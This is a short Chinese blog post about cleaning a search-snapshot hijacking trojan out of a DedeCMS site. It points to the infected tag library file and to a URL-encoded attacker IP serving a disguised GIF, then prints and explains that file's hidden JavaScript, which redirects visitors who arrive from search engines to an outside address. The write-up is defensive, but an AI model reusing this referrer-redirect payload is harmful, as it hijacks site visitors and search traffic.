dedecms织梦清除快照劫持木马

做dedecms的人都知道，这个是一个自定义标签的调用方式，其源码在：/include/taglib/dinfo.lib.php里面。于是打开这个文件，看到如下代码：

[代码]php代码：

>dede>>

系统默认标签

全局标记

V55,V56,V57

系统默认标签

{dede:dinfo /}

>>dede>>*/

function lib_dinfo()

{

global $dsql,$envs;

$revalue = '';

return $revalue;

}

刚开始也没有看出什么问题，就是一段js代码，然后引用了一个图片，不过访问下这个图片地址就知道了，在浏览器中输入这个地址：%31%31%38%2e%32%34%34%2e%32%31%35%2e%32%31%33/images/page_bg.gif

能看到如下代码：

[代码]js代码：

GID89a="";

var s=document.referrer;

var str=window.location.href;

if(s.indexOf("go"+"o"+"gle")>0 || s.indexOf("b"+"ai"+"du")>0 || s.indexOf("y"+"ahoo")>0 || s.indexOf("s"+"ogou")>0 || s.indexOf("bing")>0 || s.indexOf("360")>0 || s.indexOf("s"+"os"+"o")>0 || s.indexOf("youdao")>0 )

window.location.href="?cpy="+str+"&kecy="+s;

怎么样，看出问题来了吧？

简单解说一下：

[代码]js代码：

if(s.indexOf("go"+"o"+"gle")>0 || s.indexOf("b"+"ai"+"du")>0 || s.indexOf("y"+"ahoo")>0 || s.indexOf("s"+"ogou")>0 || s.indexOf("bing")>0 || s.indexOf("360")>0 || s.indexOf("s"+"os"+"o")>0 || s.indexOf("youdao")>0 )

这里就是判断来路，如果来源是：google、百度、yahoo、sogou、bing、360、soso、youdao，就跳转到下面这个地址：

[代码]js代码：

?cpy="+str+"&kecy="+s;